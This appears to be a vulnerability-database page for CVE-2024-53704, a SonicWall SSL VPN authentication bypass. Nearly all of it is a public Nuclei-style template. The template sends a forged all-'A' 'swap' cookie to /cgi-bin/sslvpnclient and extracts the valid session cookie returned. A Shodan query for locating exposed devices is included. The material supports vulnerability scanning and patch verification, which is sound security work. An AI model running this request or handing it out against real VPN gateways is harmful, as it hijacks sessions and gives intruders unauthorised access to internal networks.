CVE-2024-53704: SSL VPN Session Hijacking

日期: 2025-08-01 | 影响软件: SSL VPN | POC: 已公开

漏洞描述

An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.

PoC代码[已公开]

id: CVE-2024-53704

info:
  name: SSL VPN Session Hijacking
  author: johnk3r
  severity: critical
  description: |
    An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.
  reference:
    - https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
    - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-53704
    cwe-id: CWE-287
    epss-score: 0.93819
    epss-percentile: 0.9986
  metadata:
    verified: true
    max-request: 1
    shodan-query: "http.html_hash:-1466805544"
  tags: cve,cve2024,sonicwall,kev,vkev

http:
  - raw:
      - |
        GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1
        Host: {{Hostname}}
        Cookie: swap=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "NELaunchX1"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: header
        regex:
          - 'Set-Cookie: swap=([a-zA-Z0-9]+);'
# digest: 490a0046304402203197025b2ff385f09caedb6581fa1865498bf8a7542caaada21e4510143b554c02203d4087ac569c6254581f8247750c0aa1032454f9bae57591bb76d9a56cd7884c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐